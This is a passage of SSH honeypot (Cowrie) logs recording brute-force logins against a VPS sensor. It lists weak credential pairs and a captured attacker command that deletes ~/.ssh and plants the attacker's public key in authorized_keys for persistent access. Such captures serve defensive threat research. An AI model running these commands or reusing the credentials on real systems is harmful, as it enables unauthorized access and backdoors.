-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T01:16:58.482407Z","src_ip":"212.227.125.160","session":"f9acbfeffb2e"}
{"eventid":"cowrie.login.failed","username":"nvidia","password":"nvidia","message":"login attempt [nvidia/nvidia] failed","sensor":"my-vps","timestamp":"2025-08-31T01:16:58.716269Z","src_ip":"212.227.125.160","session":"f9acbfeffb2e"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:16:59.885177Z","src_ip":"212.227.125.160","session":"f9acbfeffb2e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48974,"dst_ip":"1.2.3.4","dst_port":22,"session":"bc63cc1b0385","protocol":"ssh","message":"New connection: 212.227.125.160:48974 (1.2.3.4:22) [session: bc63cc1b0385]","sensor":"my-vps","timestamp":"2025-08-31T01:17:05.648497Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:17:06.071066Z","src_ip":"212.227.125.160","session":"bc63cc1b0385"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T01:17:06.071761Z","src_ip":"212.227.125.160","session":"bc63cc1b0385"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37622,"dst_ip":"1.2.3.4","dst_port":22,"session":"847a8a5ca54c","protocol":"ssh","message":"New connection: 212.227.235.229:37622 (1.2.3.4:22) [session: 847a8a5ca54c]","sensor":"my-vps","timestamp":"2025-08-31T01:17:06.411646Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:17:06.418074Z","src_ip":"212.227.235.229","session":"847a8a5ca54c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T01:17:06.647594Z","src_ip":"212.227.235.229","session":"847a8a5ca54c"}
{"eventid":"cowrie.login.failed","username":"audrey","password":"123456","message":"login attempt [audrey/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T01:17:07.583645Z","src_ip":"212.227.235.229","session":"847a8a5ca54c"}
{"eventid":"cowrie.login.failed","username":"dev","password":"admin123","message":"login attempt [dev/admin123] failed","sensor":"my-vps","timestamp":"2025-08-31T01:17:08.344876Z","src_ip":"212.227.125.160","session":"bc63cc1b0385"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:17:08.822153Z","src_ip":"212.227.235.229","session":"847a8a5ca54c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53778,"dst_ip":"1.2.3.4","dst_port":22,"session":"20548694c544","protocol":"ssh","message":"New connection: 212.227.125.160:53778 (1.2.3.4:22) [session: 20548694c544]","sensor":"my-vps","timestamp":"2025-08-31T01:17:08.905797Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:17:08.911754Z","src_ip":"212.227.125.160","session":"20548694c544"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T01:17:08.979683Z","src_ip":"212.227.125.160","session":"20548694c544"}
{"eventid":"cowrie.login.success","username":"root","password":"123456789","message":"login attempt [root/123456789] succeeded","sensor":"my-vps","timestamp":"2025-08-31T01:17:09.397891Z","src_ip":"212.227.125.160","session":"20548694c544"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T01:17:09.613454Z","src_ip":"212.227.125.160","session":"20548694c544"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T01:17:09.614152Z","src_ip":"212.227.125.160","session":"20548694c544"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:17:09.688533Z","src_ip":"212.227.125.160","session":"20548694c544"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:17:09.689595Z","src_ip":"212.227.125.160","session":"20548694c544"}
{"eventid":"cowrie.session.closed","duration":"4.3","message":"Connection lost after 4.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:17:09.983987Z","src_ip":"212.227.125.160","session":"bc63cc1b0385"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40058,"dst_ip":"1.2.3.4","dst_port":22,"session":"c8ab9af8690f","protocol":"ssh","message":"New connection: 212.227.235.229:40058 (1.2.3.4:22) [session: c8ab9af8690f]","sensor":"my-vps","timestamp":"2025-08-31T01:17:17.186412Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:17:17.187640Z","src_ip":"212.227.235.229","session":"c8ab9af8690f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T01:17:17.254842Z","src_ip":"212.227.235.229","session":"c8ab9af8690f"}
{"eventid":"cowrie.login.success","username":"root","password":"huawei@1234","message":"login attempt [root/huawei@1234] succeeded","sensor":"my-vps","timestamp":"2025-08-31T01:17:17.523799Z","src_ip":"212.227.235.229","session":"c8ab9af8690f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T01:17:17.676189Z","src_ip":"212.227.235.229","session":"c8ab9af8690f"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T01:17:17.676895Z","src_ip":"212.227.235.229","session":"c8ab9af8690f"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T01:17:17.678036Z","src_ip":"212.227.235.229","session":"c8ab9af8690f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:17:17.746758Z","src_ip":"212.227.235.229","session":"c8ab9af8690f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T01:17:17.938988Z","src_ip":"212.227.235.229","session":"c8ab9af8690f"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T01:17:17.939663Z","src_ip":"212.227.235.229","session":"c8ab9af8690f"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T01:17:18.009161Z","src_ip":"212.227.235.229","session":"c8ab9af8690f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:17:18.010052Z","src_ip":"212.227.235.229","session":"c8ab9af8690f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40440,"dst_ip":"1.2.3.4","dst_port":22,"session":"4a522fea05a6","protocol":"ssh","message":"New connection: 212.227.235.229:40440 (1.2.3.4:22) [session: 4a522fea05a6]","sensor":"my-vps","timestamp":"2025-08-31T01:17:18.073789Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:17:18.074801Z","src_ip":"212.227.235.229","session":"4a522fea05a6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T01:17:18.140250Z","src_ip":"212.227.235.229","session":"4a522fea05a6"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T01:17:18.446735Z","src_ip":"212.227.235.229","session":"4a522fea05a6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49136,"dst_ip":"1.2.3.4","dst_port":22,"session":"dbfe3f77971a","protocol":"ssh","message":"New connection: 212.227.125.160:49136 (1.2.3.4:22) [session: dbfe3f77971a]","sensor":"my-vps","timestamp":"2025-08-31T01:17:19.448673Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:17:19.449726Z","src_ip":"212.227.125.160","session":"dbfe3f77971a"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:17:19.516401Z","src_ip":"212.227.235.229","session":"4a522fea05a6"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T01:17:19.523476Z","src_ip":"212.227.125.160","session":"dbfe3f77971a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41112,"dst_ip":"1.2.3.4","dst_port":22,"session":"67257dbb9b92","protocol":"ssh","message":"New connection: 212.227.235.229:41112 (1.2.3.4:22) [session: 67257dbb9b92]","sensor":"my-vps","timestamp":"2025-08-31T01:17:19.581414Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:17:19.582498Z","src_ip":"212.227.235.229","session":"67257dbb9b92"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T01:17:19.648318Z","src_ip":"212.227.235.229","session":"67257dbb9b92"}
{"eventid":"cowrie.login.success","username":"root","password":"rootroot","message":"login attempt [root/rootroot] succeeded","sensor":"my-vps","timestamp":"2025-08-31T01:17:19.788797Z","src_ip":"212.227.125.160","session":"dbfe3f77971a"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T01:17:19.953773Z","src_ip":"212.227.235.229","session":"67257dbb9b92"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:17:20.021330Z","src_ip":"212.227.235.229","session":"67257dbb9b92"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:17:20.022594Z","src_ip":"212.227.235.229","session":"c8ab9af8690f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T01:17:20.088974Z","src_ip":"212.227.125.160","session":"dbfe3f77971a"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T01:17:20.089798Z","src_ip":"212.227.125.160","session":"dbfe3f77971a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:17:20.164657Z","src_ip":"212.227.125.160","session":"dbfe3f77971a"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:17:20.165806Z","src_ip":"212.227.125.160","session":"dbfe3f77971a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55994,"dst_ip":"1.2.3.4","dst_port":22,"session":"aa152a3cb92d","protocol":"ssh","message":"New connection: 212.227.125.160:55994 (1.2.3.4:22) [session: aa152a3cb92d]","sensor":"my-vps","timestamp":"2025-08-31T01:17:29.787626Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:17:29.788297Z","src_ip":"212.227.125.160","session":"aa152a3cb92d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh